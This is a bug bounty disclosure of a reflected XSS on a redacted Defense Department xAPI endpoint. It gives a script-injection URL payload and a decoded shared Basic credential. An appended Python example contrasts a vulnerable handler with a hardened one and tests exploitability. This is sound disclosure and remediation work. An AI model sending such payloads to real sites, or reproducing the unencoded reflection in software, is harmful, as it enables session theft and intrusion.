hackeroneNotajaxH1:1825942

U.S. Dept Of Defense: XSS on ( █████████.gov ) Via URL path

2023-01-08 06:35:55
notajax
hackerone.com
dept of defense
xss
url path
burp intercepter
headers
authorization
x-experience-api-version
account takeover
video poc
mitigation
inputs
cve-2021-41878
bug bounty

EPSS

0.015

Percentile

87.4%

Hi team,
I was able to execute XSS on ███████.gov.

Steps to reproduce:
1 - Turn on the Burp interceptor.
2 - Go to https://██████.gov/xapi/statements?file"><script>alert(document.domain)</script>
3 - In the interceptor, add the following headers:

Authorization: Basic eGFwaS10b29sczp4YXBpLXRvb2xz
X-Experience-Api-Version: 1.0.1

4 - When you send this GET request, you will receive a response with the XSS payload executed.

Impact

An attacker can send the malicious link to victims and steal the victims' cookies, leading to account takeover.

System Host(s)

www.███.gov

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-41878

Steps to Reproduce

I have attached the video PoC; please check it out.

Suggested Mitigation/Remediation Actions

Sanitize the inputs in the URL.
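The reproduction steps and the suggested remediation above, worked through as an added example that is not part of the report and not the affected site's code. It assumes a hypothetical xAPI /statements handler that rejects an unknown query parameter with an error page naming that parameter (the shape that would produce the reflection the report describes), uses example.gov as a stand-in host, and takes the accepted parameter names from the xAPI 1.0.x GET /statements resource. It shows the vulnerable reflection, the hardened response (output encoding and a non-HTML content type rather than input sanitization), a check that the payload would actually execute in a browser, and the decoded Basic credential from the PoC headers.

```python
"""Reflected XSS via a URL query parameter: hypothetical vulnerable handler,
hardened handler, exploitability check and PoC request details.

Added example. The handler shape, the example.gov host and the response
bodies are assumptions; nothing here is the affected site's code.
"""
import base64
import html
import json
from urllib.parse import parse_qsl, urlsplit

# Payload exactly as in the report; the host is a constructed placeholder.
PAYLOAD = 'file"><script>alert(document.domain)</script>'
POC_URL = f"https://example.gov/xapi/statements?{PAYLOAD}"

# Query parameters accepted by GET /statements in xAPI 1.0.x.
ALLOWED_PARAMS = {
    "statementId", "voidedStatementId", "agent", "verb", "activity",
    "registration", "related_activities", "related_agents", "since",
    "until", "limit", "format", "attachments", "ascending",
}


def poc_headers() -> dict[str, str]:
    """The two headers the report adds in Burp before sending the GET."""
    return {
        "Authorization": "Basic eGFwaS10b29sczp4YXBpLXRvb2xz",
        "X-Experience-Api-Version": "1.0.1",
    }


def decode_basic(header_value: str) -> str:
    """Decode an HTTP Basic credential (a triager's first check on a PoC)."""
    scheme, _, token = header_value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic credential")
    return base64.b64decode(token).decode()


def unknown_params(url: str) -> list[str]:
    """Query keys the endpoint does not know. keep_blank_values matters: the
    PoC query has no '=', so the whole payload is parsed as a key."""
    query = urlsplit(url).query
    return [k for k, _ in parse_qsl(query, keep_blank_values=True)
            if k not in ALLOWED_PARAMS]


def vulnerable_handler(url: str) -> tuple[int, dict[str, str], str]:
    """Hypothetical vulnerable behaviour: the rejected parameter name is
    interpolated into an HTML error page without encoding."""
    bad = unknown_params(url)
    if bad:
        body = f"<html><body><p>Unknown parameter: {bad[0]}</p></body></html>"
        return 400, {"Content-Type": "text/html; charset=utf-8"}, body
    return 200, {"Content-Type": "application/json"}, json.dumps({"statements": [], "more": ""})


def html_error_page(param: str) -> str:
    """If an HTML error page is unavoidable, encode the value for the HTML
    text context it lands in; html.escape also encodes the quote characters."""
    return f"<html><body><p>Unknown parameter: {html.escape(param)}</p></body></html>"


def hardened_handler(url: str) -> tuple[int, dict[str, str], str]:
    """Same logic, fixed: the error is returned as JSON with an explicit
    non-HTML content type and nosniff, so the browser never renders it."""
    bad = unknown_params(url)
    if bad:
        body = json.dumps({"error": "Unknown parameter", "parameter": bad[0]})
        return 400, {"Content-Type": "application/json",
                     "X-Content-Type-Options": "nosniff"}, body
    return 200, {"Content-Type": "application/json"}, json.dumps({"statements": [], "more": ""})


def executes_in_browser(status: int, headers: dict[str, str], body: str,
                        payload: str = PAYLOAD) -> bool:
    """Reflection alone is not XSS: the payload must appear unencoded in a
    document the browser will render as HTML (text/html, or no type at all,
    which browsers sniff)."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return ctype in ("", "text/html") and payload in body


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_handler), ("hardened", hardened_handler)):
        status, headers, body = handler(POC_URL)
        print(f"{name}: {status} {headers['Content-Type']} "
              f"exploitable={executes_in_browser(status, headers, body)}")
    print("Basic credential in PoC:", decode_basic(poc_headers()["Authorization"]))
```

Two points a practitioner verifying this report would check with the code above. First, the Basic credential the PoC adds decodes to `xapi-tools:xapi-tools`, a shared LRS client credential, and the PoC as written depends on that header and on `X-Experience-Api-Version`, which a victim's browser will not send when following a link; retesting `POC_URL` without `poc_headers()` shows whether the reflection still occurs and therefore whether the stated impact holds. Second, the hardened handler does not sanitize the input, because stripping characters from the URL leaves every other reflection point open; it encodes at the output and returns a content type the browser will not execute, which is what `executes_in_browser` measures.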
